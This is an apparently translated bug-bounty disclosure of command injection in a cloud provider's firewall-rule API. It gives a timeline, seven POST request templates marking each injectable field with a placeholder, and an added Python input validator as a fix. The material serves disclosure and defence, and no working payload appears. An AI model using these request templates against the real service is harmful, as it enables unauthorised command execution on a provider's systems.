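2014-12-09: Details reported to the vendor; awaiting vendor handling
2014-12-13: Vendor confirmed; details disclosed to the vendor only
2014-12-23: Details disclosed to core white hats and experts in related fields
2015-01-02: Details disclosed to regular white hats
2015-01-12: Details disclosed to intern white hats
2015-01-23: Details disclosed to the public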
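An interesting old problem
I saw that this was reported as fixed, so I rechecked it.
Within the same request, the same problem is still present, and the other endpoints are presumably no better. The impact really is very serious, don't you think? Based on my guess about the business logic, I suspect the target server may be ........; if it really is, how about a high rank this time?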
POST /api/ufirewall HTTP/1.1
Host: unet.ucloud.cn

group_name=a2dsssfasdfas&description=dfadsfads&rule_set%5B0%5D%5Baction%5D=ACCEPT&rule_set%5B0%5D%5Bproto_type%5D=1&rule_set%5B0%5D%5Bdst_port%5D=1-65535&rule_set%5B0%5D%5Bsrc_ip%5D=0.0.0.0%2F0&rule_set%5B0%5D%5Bpriority%5D=[command injection here]&use_session=yes&format=json&region_id=5001&zone_id=1

POST /api/ufirewall HTTP/1.1
Host: unet.ucloud.cn

group_name=a2dsssfasdfas&description=dfadsfads&rule_set%5B0%5D%5Baction%5D=ACCEPT&rule_set%5B0%5D%5Bproto_type%5D=1&rule_set%5B0%5D%5Bdst_port%5D=1-65535&rule_set%5B0%5D%5Bsrc_ip%5D=[command injection here]&rule_set%5B0%5D%5Bpriority%5D=150&use_session=yes&format=json&region_id=5001&zone_id=1

POST /api/ufirewall HTTP/1.1
Host: unet.ucloud.cn

group_name=a2dsssfasdfas&description=dfadsfads&rule_set%5B0%5D%5Baction%5D=ACCEPT&rule_set%5B0%5D%5Bproto_type%5D=1&rule_set%5B0%5D%5Bdst_port%5D=[command injection here]&rule_set%5B0%5D%5Bsrc_ip%5D=0.0.0.0%2F0&rule_set%5B0%5D%5Bpriority%5D=150&use_session=yes&format=json&region_id=5001&zone_id=1

POST /api/ufirewall HTTP/1.1
Host: unet.ucloud.cn

group_name=a2dsssfasdfas&description=dfadsfads&rule_set%5B0%5D%5Baction%5D=ACCEPT&rule_set%5B0%5D%5Bproto_type%5D=[command injection here]&rule_set%5B0%5D%5Bdst_port%5D=1-65535&rule_set%5B0%5D%5Bsrc_ip%5D=0.0.0.0%2F0&rule_set%5B0%5D%5Bpriority%5D=150&use_session=yes&format=json&region_id=5001&zone_id=1

POST /api/ufirewall HTTP/1.1
Host: unet.ucloud.cn

group_name=a2dsssfasdfas&description=dfadsfads&rule_set%5B0%5D%5Baction%5D=[command injection here]&rule_set%5B0%5D%5Bproto_type%5D=1&rule_set%5B0%5D%5Bdst_port%5D=1-65535&rule_set%5B0%5D%5Bsrc_ip%5D=0.0.0.0%2F0&rule_set%5B0%5D%5Bpriority%5D=150&use_session=yes&format=json&region_id=5001&zone_id=1

POST /api/ufirewall HTTP/1.1
Host: unet.ucloud.cn

group_name=a2dsssfasdfas&description=[command injection here]&rule_set%5B0%5D%5Baction%5D=ACCEPT&rule_set%5B0%5D%5Bproto_type%5D=1&rule_set%5B0%5D%5Bdst_port%5D=1-65535&rule_set%5B0%5D%5Bsrc_ip%5D=0.0.0.0%2F0&rule_set%5B0%5D%5Bpriority%5D=150&use_session=yes&format=json&region_id=5001&zone_id=1

POST /api/ufirewall HTTP/1.1
Host: unet.ucloud.cn

group_name=[command injection here]&description=dfadsfads&rule_set%5B0%5D%5Baction%5D=ACCEPT&rule_set%5B0%5D%5Bproto_type%5D=1&rule_set%5B0%5D%5Bdst_port%5D=1-65535&rule_set%5B0%5D%5Bsrc_ip%5D=0.0.0.0%2F0&rule_set%5B0%5D%5Bpriority%5D=150&use_session=yes&format=json&region_id=5001&zone_id=1
Severity: High
Vulnerability Rank: 12
Confirmed: 2014-12-13 11:14
Fixed, thank you.
None yet
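The report shows that every field of the firewall-rule request reached a command unchecked, so a fix has to cover all seven fields rather than one parameter at a time. The following is an added example, not code from the report or from the vendor: a server-side validator that parses the request body into typed values before anything is handed to the backend. The allowed actions, the numeric ranges and the character sets for group_name and description are assumptions, since the page only shows the sample values.

```python
import ipaddress
import re
from urllib.parse import parse_qs

# Assumed allow-lists and ranges; the page only shows ACCEPT, proto_type=1, priority=150.
ALLOWED_ACTIONS = {"ACCEPT", "DROP"}
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")
DESC_RE = re.compile(r"[A-Za-z0-9 _.-]{0,128}")
PORTS_RE = re.compile(r"([0-9]{1,5})(?:-([0-9]{1,5}))?")
INT_RE = re.compile(r"[0-9]{1,5}")
# Rule fields of the request body as shown in the report, with its benign values.
SAMPLE_BODY = "group_name=a2dsssfasdfas&description=dfadsfads&rule_set%5B0%5D%5Baction%5D=ACCEPT&rule_set%5B0%5D%5Bproto_type%5D=1&rule_set%5B0%5D%5Bdst_port%5D=1-65535&rule_set%5B0%5D%5Bsrc_ip%5D=0.0.0.0%2F0&rule_set%5B0%5D%5Bpriority%5D=150"


def _bounded_int(value, lo, hi, field):
    if not INT_RE.fullmatch(value) or not lo <= int(value) <= hi:
        raise ValueError(f"invalid {field}")
    return int(value)


def validate_rule(body):
    """Parse a urlencoded rule body; return typed, canonical fields or raise ValueError."""
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    rule = lambda name: form.get(f"rule_set[0][{name}]", "")
    if not NAME_RE.fullmatch(form.get("group_name", "")):
        raise ValueError("invalid group_name")
    if not DESC_RE.fullmatch(form.get("description", "")):
        raise ValueError("invalid description")
    if rule("action") not in ALLOWED_ACTIONS:
        raise ValueError("invalid action")
    ports = PORTS_RE.fullmatch(rule("dst_port"))
    if not ports:
        raise ValueError("invalid dst_port")
    lo, hi = int(ports.group(1)), int(ports.group(2) or ports.group(1))
    if not 1 <= lo <= hi <= 65535:
        raise ValueError("invalid dst_port")
    try:
        src = ipaddress.ip_network(rule("src_ip"), strict=False)
    except ValueError:
        raise ValueError("invalid src_ip") from None
    # Return re-serialised values, never the raw request strings, and hand them
    # to the backend as discrete arguments (argv list or API call), not a shell line.
    return {
        "group_name": form["group_name"],
        "description": form.get("description", ""),
        "action": rule("action"),
        "proto_type": _bounded_int(rule("proto_type"), 0, 255, "proto_type"),
        "dst_port": (lo, hi),
        "src_ip": str(src),
        "priority": _bounded_int(rule("priority"), 1, 65535, "priority"),
    }
```

Validation of this kind is a second layer: the backend should still receive the values as separate arguments so that no field is ever interpreted by a shell.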